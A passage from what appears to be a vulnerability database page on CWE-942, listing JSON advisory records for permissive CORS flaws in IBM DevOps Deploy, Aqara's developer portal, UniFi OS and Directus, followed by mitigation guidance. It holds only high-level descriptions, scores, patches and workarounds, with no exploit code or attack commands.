"nvd_published_at": "2026-06-30T20:17:28Z",
"severity": "MODERATE"
},
"details": "IBM UCD - IBM DevOps Deploy 8.1 through 8.1.2.6, and 8.2 through 8.2.1.0 uses Cross-Origin Resource Sharing (CORS) which could allow an attacker to carry out privileged actions and retrieve sensitive information as the domain name is not being limited to only trusted domains.",
"id": "GHSA-fq2g-wf56-3prg",
"modified": "2026-06-30T21:31:44Z",
"published": "2026-06-30T21:31:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12084"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7277575"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FQRJ-M2F5-X9PJ
Vulnerability from github – Published: 2026-06-12 18:31 – Updated: 2026-06-12 18:31The Aqara Developer Portal (developer.aqara.com) and shared test environments (developer-test.aqara.com, aiot-test.aqara.com) exhibit cross-origin request sharing, which is an instance of "CWE-942: Permissive Cross-domain Policy with Untrusted Domains," and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N (8.2 High).
{
"affected": [],
"aliases": [
"CVE-2026-50088"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-12T16:16:32Z",
"severity": "HIGH"
},
"details": "The Aqara Developer Portal (developer.aqara.com) and shared test environments (developer-test.aqara.com, aiot-test.aqara.com) exhibit cross-origin request sharing, which is an instance of \"CWE-942: Permissive Cross-domain Policy with Untrusted Domains,\" and has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N (8.2 High).",
"id": "GHSA-fqrj-m2f5-x9pj",
"modified": "2026-06-12T18:31:59Z",
"published": "2026-06-12T18:31:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50088"
},
{
"type": "WEB",
"url": "https://github.com/xn0tsa/theres-no-place-like-home"
},
{
"type": "WEB",
"url": "https://www.runzero.com/advisories/aqara-dev-portal-cors-cve-2026-50088"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FWMW-87X4-WJV5
Vulnerability from github – Published: 2026-07-02 15:32 – Updated: 2026-07-02 15:32A malicious actor who lures an authenticated user to a malicious page could exploit a Cross-Origin Resource Sharing (CORS) misconfiguration found in UniFi OS to trigger actions in UniFi OS using that user's session.
{
"affected": [],
"aliases": [
"CVE-2026-55110"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-02T15:17:04Z",
"severity": "HIGH"
},
"details": "A malicious actor who lures an authenticated user to a malicious page could exploit a Cross-Origin Resource Sharing (CORS) misconfiguration found in UniFi OS to trigger actions in UniFi OS using that user\u0027s session.",
"id": "GHSA-fwmw-87x4-wjv5",
"modified": "2026-07-02T15:32:13Z",
"published": "2026-07-02T15:32:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55110"
},
{
"type": "WEB",
"url": "https://community.ui.com/releases/Security-Advisory-Bulletin-066-066/984eceb3-49c8-4227-942d-671c289b3afc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-G27J-74FP-XFPR
Vulnerability from github – Published: 2022-04-05 18:31 – Updated: 2025-04-14 22:07Impact
The default value for the CORS_ENABLED and CORS_ORIGIN configuration was set to be very permissive by default. This could lead to unauthorized access in uncontrolled environments when the configuration hasn't been changed.
Patches
The default values for CORS have been changed in https://github.com/directus/directus/pull/12022 which is released under 9.7.0
Workarounds
Configure the CORS environment variables to match your project's usage, rather than leaving them at the (permissive) defaults.
For more information
If you have any questions or comments about this advisory: * Open an issue in directus/directus * Email us at security@directus.io
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "directus"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-26969"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2022-04-05T18:31:22Z",
"nvd_published_at": "2022-12-26T06:15:00Z",
"severity": "CRITICAL"
},
"details": "### Impact\n\nThe default value for the `CORS_ENABLED` and `CORS_ORIGIN` configuration was set to be very permissive by default. This could lead to unauthorized access in uncontrolled environments when the configuration hasn\u0027t been changed.\n\n### Patches\n\nThe default values for CORS have been changed in https://github.com/directus/directus/pull/12022 which is released under 9.7.0\n\n### Workarounds\n\nConfigure the CORS environment variables to match your project\u0027s usage, rather than leaving them at the (permissive) defaults.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [directus/directus](https://github.com/directus/directus)\n* Email us at [security@directus.io](mailto:security@directus.io)",
"id": "GHSA-g27j-74fp-xfpr",
"modified": "2025-04-14T22:07:39Z",
"published": "2022-04-05T18:31:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26969"
},
{
"type": "WEB",
"url": "https://github.com/directus/directus/pull/12022"
},
{
"type": "WEB",
"url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS"
},
{
"type": "PACKAGE",
"url": "https://github.com/directus/directus"
},
{
"type": "WEB",
"url": "https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md"
},
{
"type": "WEB",
"url": "https://github.com/directus/directus/releases/tag/v9.7.0"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Insecure default value for CORS configuration"
}
Mitigation
Strategy: Attack Surface Reduction
Define a restrictive Content Security Policy [REF-1486] or cross-domain policy file.
Mitigation
Strategy: Attack Surface Reduction
Avoid using wildcards in the CSP / cross-domain policy file. Any domain matching the wildcard expression will be implicitly trusted, and can perform two-way interaction with the target server.
Mitigation
Strategy: Environment Hardening
For Flash, modify crossdomain.xml to use meta-policy options such as 'master-only' or 'none' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server.
No CAPEC attack patterns related to this CWE.